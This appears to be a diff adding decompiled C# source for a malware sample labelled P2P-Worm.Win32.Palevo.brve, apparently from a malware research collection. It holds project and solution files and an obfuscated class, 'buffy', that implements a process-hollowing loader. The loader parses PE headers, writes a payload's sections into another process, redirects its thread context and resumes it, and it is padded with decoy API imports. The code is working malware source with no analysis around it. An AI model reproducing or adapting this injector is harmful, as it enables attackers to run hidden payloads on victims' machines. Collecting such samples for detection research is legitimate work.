+    long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
+    int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
+    int num18 = 0;
+    while (num18 <= num17)
+    {
+      ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
+      buffy.Section_Header sectionHeader1;
+      object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
+      buffy.Section_Header sectionHeader2;
+      sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
+      byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
+      int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
+      int index = 0;
+      while (index <= num19)
+      {
+        numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
+        checked { ++index; }
+      }
+      buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
+      object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+      IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
+      int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
+      byte[] DSAE32_2 = numArray;
+      int da22S3 = checked ((int) sectionHeader1.DA22S3);
+      int num20 = checked ((int) num15);
+      ref int local13 = ref num20;
+      int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
+      num15 = checked ((uint) num20);
+      checked { ++num18; }
+    }
+    object bytes = (object) BitConverter.GetBytes(num11);
+    buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
+    object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
+    int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    byte[] DSAE32_3 = (byte[]) bytes;
+    int num22 = checked ((int) num15);
+    ref int local14 = ref num22;
+    int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
+    num12 = checked ((uint) num22);
+    NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
+    {
+      (object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
+    }, (string[]) null, (Type[]) null);
+    buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
+    object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
+    object obj29 = Instance6;
+    context2 = obj29 != null ? (buffy.Context) obj29 : context1;
+    ref buffy.Context local15 = ref context2;
+    int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
+    object obj30 = (object) context2;
+    buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
+    object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
+    int num25 = (int) ws2XvbnvO9_2(DASEAS);
+  }
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
+
+  [DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RpcNsProfileEltAdd(
+    long ProfileNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
+    ref IntPtr IfId,
+    long MemberNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
+    long Priority,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
+
+  [DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
+
+  [DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
+
+  [DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MgmGetNextMfeStats(
+    ref IntPtr pimmStart,
+    ref long pdwBufferSize,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
+    ref long pdwNumEntries);
+
+  [DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MprAdminDeviceEnum(
+    ref IntPtr hMprServer,
+    long dwLevel,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
+    ref long lpdwTotalEntries);
+
+  [DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MsiDatabaseImport(
+    ref IntPtr hDatabase,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
+
+  [DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetReplExportDirSetInfo(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
+    ref long parm_err);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetUseGetInfo(
+    ref IntPtr UncServerName,
+    ref IntPtr UseName,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsoleInput(
+    long hConsoleInput,
+    ref IntPtr lpBuffer,
+    long nLength,
+    ref long lpNumberOfEventsRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
+
+  [DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SnmpMgrCtl(
+    ref IntPtr session,
+    long dwCtlCode,
+    ref long lpvInBuffer,
+    long cbInBuffer,
+    ref long lpvOUTBuffer,
+    long cbOUTBuffer,
+    ref long lpcbBytesReturned);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long AddAuditAccessAceEx(
+    IntPtr pAcl,
+    long dwAceRevision,
+    long AceFlags,
+    long dwAccessMask,
+    ref IntPtr pSid,
+    long bAuditSuccess,
+    long bAuditFailure);
+
+  [DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLInstallerError(
+    int iError,
+    ref long pfErrorCode,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
+    int cbErrorMsgMax,
+    ref int pcbErrorMsg);
+
+  [DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
+
+  [DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RasSetCredentials(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    ref IntPtr TLPRASCREDENTIALSA,
+    long @bool);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsole(
+    long hConsoleInput,
+    ref long lpBuffer,
+    long nNumberOfCharsToRead,
+    ref long lpNumberOfCharsRead,
+    ref long lpReserved);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadEncryptedFileRaw(
+    ref IntPtr pfExportCallback,
+    ref long pvCallbackContext,
+    ref long pvContext);
+
+  [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadPrinter(
+    long hPrinter,
+    ref long pBuf,
+    long cdBuf,
+    ref long pNoBytesRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReleaseSemaphore(
+    long hSemaphore,
+    long lReleaseCount,
+    ref long lpPreviousCount);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetStringTypeEx(
+    long Locale,
+    long dwInfoType,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
+    long cchSrc,
+    ref int lpCharType);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetVolumePathName(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
+    long cchBufferLength);
+
+  [DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr ToAscii(
+    long uVirtKey,
+    long uScanCode,
+    ref byte lpbKeyState,
+    ref long lpwTransKey,
+    long fuState);
+
+  private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
+
+  public struct Context
+  {
+    public uint II69TOHMUR;
+    public uint d2;
+    public uint das;
+    public uint d9;
+    public uint ad;
+    public uint dsa;
+    public uint ds;
+    public buffy.Save Save;
+    public uint dh;
+    public uint sad;
+    public uint da;
+    public uint MD;
+    public uint RD;
+    public uint mSI;
+    public uint WDA;
+    public uint AD3;
+    public uint D21;
+    public uint AS4;
+    public uint K32;
+    public uint F2W;
+    public uint HHJ;
+    public uint ADF5;
+    public uint GSSA;
+    public uint DSAAA;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
+    public byte[] er6rgdr65;
+  }
+
+  public struct Save
+  {
+    public uint KD7JX2MXT;
+    public uint JCNS3ZPSXO;
+    public uint DAS3;
+    public uint DAS23;
+    public uint ADSA;
+    public uint DAF35;
+    public uint FA32D;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
+    public byte[] FSDRF43;
+    public uint FA32QA;
+  }
+
+  public struct Misc
+  {
+    public uint SDUHRL;
+    public uint GSIJ;
+  }
+
+  public struct Section_Header
+  {
+    public byte FSDPOU4PO3;
+    public buffy.Misc Mi2sc;
+    public uint AL8ZCRFWNU;
+    public uint DA22S3;
+    public uint PoinEEter;
+    public uint E2Q4RS;
+    public uint FS523QF;
+    public uint FSB43FSD4;
+    public uint QBFAS4E;
+    public uint AS32QFZS;
+  }
+
+  public struct Process_Information
+  {
+    public IntPtr DAS4QQW;
+    public IntPtr RFSER;
+    public int TGJWE;
+    public int SDFFFFFFFFFF;
+  }
+
+  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+  public struct Startup_Information
+  {
+    public int CSZE;
+    public string FSDR4G;
+    public string AAAAAAAAAA;
+    public string AADDDDDDD;
+    public int ADA;
+    public int C;
+    public int AEDS;
+    public int DASDDDD;
+    public int XASE4;
+    public int DAS3EDFZ;
+    public int DVA3ES;
+    public int CCCCQ;
+    public short FDSRS;
+    public short VYE5X;
+    public int KHJKIHJK;
+    public int KHJKHJK;
+    public int KHJKHJ;
+    public int KHJKJHK;
+  }
+
+  public struct Security_Flags
+  {
+    public int GFSETWE;
+    public IntPtr EWEWWW;
+    public int DASDAS;
+  }
+
+  public struct DOS_Header
+  {
+    public ushort DASDASFASF;
+    public ushort QWEQWE;
+    public ushort EQWEQWEQWE;
+    public ushort HFGHFGHFGH;
+    public ushort HFGHFGHFG;
+    public ushort DASD444444;
+    public ushort DASFASE33;
+    public ushort DASKGHJ;
+    public ushort DASVZDF;
+    public ushort VXCVXC;
+    public ushort VXCVXCV;
+    public ushort EWECS;
+    public ushort EWADC;
+    public ushort UADA3;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
+    public ushort[] ReservWWWWWWWWWWWWWWWedA;
+    public ushort DAS4E;
+    public ushort UJJ;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
+    public ushort[] DDDDDDDDD;
+    public int DASE3ASDAS;
+  }
+
+  public struct NT_Headers
+  {
+    public uint SSSSSSSSSSSQ;
+    public buffy.File_Header DSEEEEE;
+    public buffy.Optional_Headers OOOU;
+  }
+
+  public struct File_Header
+  {
+    public ushort ITTTTTTTT;
+    public ushort DAAAAAAAA3;
+    public uint HRFTYTYTR;
+    public uint GJGFSFS;
+    public uint FSVGY;
+    public ushort FSFV;
+    public ushort A34FFC;
+  }
+
+  public struct Optional_Headers
+  {
+    public ushort WWWWWWWWW;
+    public byte MaAAAAAAAAAAAjor;
+    public byte MiSSSSSSSSSSSnor;
+    public uint SSSSSSSSSSSSS;
+    public uint FFFFFFFFFFF;
+    public uint XXXXXXXX;
+    public uint DDDDDDDDAAA;
+    public uint FSSSSSSS;
+    public uint RSFS43;
+    public uint DFAZDASD;
+    public uint SectionA;
+    public uint FileA;
+    public ushort GDFTDFFFF;
+    public ushort HGDFHD564;
+    public ushort GD5ERGD;
+    public ushort FSD5YHD;
+    public ushort ASDASG;
+    public ushort AS4ASAS;
+    public uint CCC;
+    public uint DASRDASRASR;
+    public uint WQDASDASD;
+    public uint Assssssss;
+    public ushort fsd4s;
+    public ushort fjio;
+    public uint dasrlajstpoi;
+    public uint dasdraskyjhuasp;
+    public uint SHRedas4wa9uqserve;
+    public uint fsdtsysyt;
+    public uint eawdasdas3;
+    public uint Cocccunt;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
+    public buffy.Data_Directory[] GSDGSDT4;
+  }
+
+  public struct Data_Directory
+  {
+    public uint ewq34q234;
+    public uint das34aw33;
+  }
+
+  public delegate bool GN04L0ER8I(
+    string ASFASE3,
+    string DASDAS3E2,
+    ref buffy.Security_Flags DASCASE,
+    ref buffy.Security_Flags CASE222,
+    bool DAS432E,
+    uint AEDFKJK32,
+    IntPtr DSA43R3W,
+    string ase32ew,
+    [In] ref buffy.Startup_Information das43fsa,
+    out buffy.Process_Information das3);
+
+  public delegate bool ZGOQ8VM05M(
+    IntPtr DASE32,
+    int AL8ZCRFWNU,
+    byte[] DSAE32,
+    int DASEADAS,
+    out int ASD43FA);
+
+  public delegate int Q7QRRP639W(
+    IntPtr FASFDASDAS,
+    int AL8ZCRFWNU,
+    ref int CAS32,
+    int ASDASC,
+    ref int CASTWE);
+
+  public delegate IntPtr W6CTR6GLCC(
+    IntPtr DASE43E,
+    int AL8ZCRFWNU,
+    uint DASCAS3,
+    uint DAS3,
+    uint DAS32);
+
+  public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
+
+  public delegate uint WS2XVBNVO9(IntPtr DASEAS);
+
+  public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
+
+  public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyApplication.cs

@@ -0,0 +1,18 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyApplication
+// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
+
+using Microsoft.VisualBasic.ApplicationServices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+
+namespace My
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class MyApplication : ApplicationBase
+  {
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyComputer.cs

@@ -0,0 +1,24 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyComputer
+// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
+
+using Microsoft.VisualBasic.Devices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+
+namespace My
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class MyComputer : Computer
+  {
+    [DebuggerHidden]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    public MyComputer()
+    {
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyProject.cs

@@ -0,0 +1,108 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyProject
+// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace My
+{
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [StandardModule]
+  [HideModuleName]
+  internal sealed class MyProject
+  {
+    private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
+    private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
+
+    [HelpKeyword("My.Computer")]
+    internal static MyComputer Computer
+    {
+      [DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.Application")]
+    internal static MyApplication Application
+    {
+      [DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.User")]
+    internal static User User
+    {
+      [DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.WebServices")]
+    internal static MyProject.MyWebServices WebServices
+    {
+      [DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
+    internal sealed class MyWebServices
+    {
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      internal new Type GetType() => typeof (MyProject.MyWebServices);
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override string ToString() => base.ToString();
+
+      [DebuggerHidden]
+      private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
+
+      [DebuggerHidden]
+      private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public MyWebServices()
+      {
+      }
+    }
+
+    [ComVisible(false)]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    internal sealed class ThreadSafeObjectProvider<T> where T : new()
+    {
+      internal T GetInstance
+      {
+        [DebuggerHidden] get
+        {
+          if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
+            MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
+          return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
+        }
+      }
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public ThreadSafeObjectProvider()
+      {
+      }
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.csproj

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{9F4D5823-B0B6-4011-9309-6008EBD4A806}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>66666</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>My</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="pizde.cs" />
+    <Compile Include="buffy.cs" />
+    <Compile Include="MyApplication.cs" />
+    <Compile Include="MyComputer.cs" />
+    <Compile Include="MyProject.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "66666", "P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.csproj", "{9F4D5823-B0B6-4011-9309-6008EBD4A806}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/buffy.cs

@@ -0,0 +1,632 @@
+// Decompiled with JetBrains decompiler
+// Type: buffy
+// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+public class buffy
+{
+  public const long ASDFASFASF = 2778;
+  public const long FASFASFASF = 60116;
+  public const long AFSFASFASCFC = 218;
+  public const long ASDASCASDASD = 218;
+  public const long BVCXBXCBXCB = 218;
+  public const long BXCBXCBXCB = 253;
+  public const long FSDR3FSF = 218;
+  public const long KKKKKKKKKDDDDDDD = 17247;
+  public const uint FSSSSSSSSSSSSSSSSSS = 218;
+
+  public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
+  {
+    object Instance1 = (object) new buffy.Context();
+    object obj1 = (object) new buffy.Process_Information();
+    object obj2 = (object) new buffy.Startup_Information();
+    object obj3 = (object) new buffy.Security_Flags();
+    object obj4 = (object) new buffy.Security_Flags();
+    object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
+    int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
+    Type Type = typeof (Marshal);
+    object[] objArray1 = new object[2];
+    object[] objArray2 = objArray1;
+    object Instance3 = Instance2;
+    object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    objArray2[0] = objectValue;
+    objArray1[1] = (object) dosHeader1.GetType();
+    object[] objArray3 = objArray1;
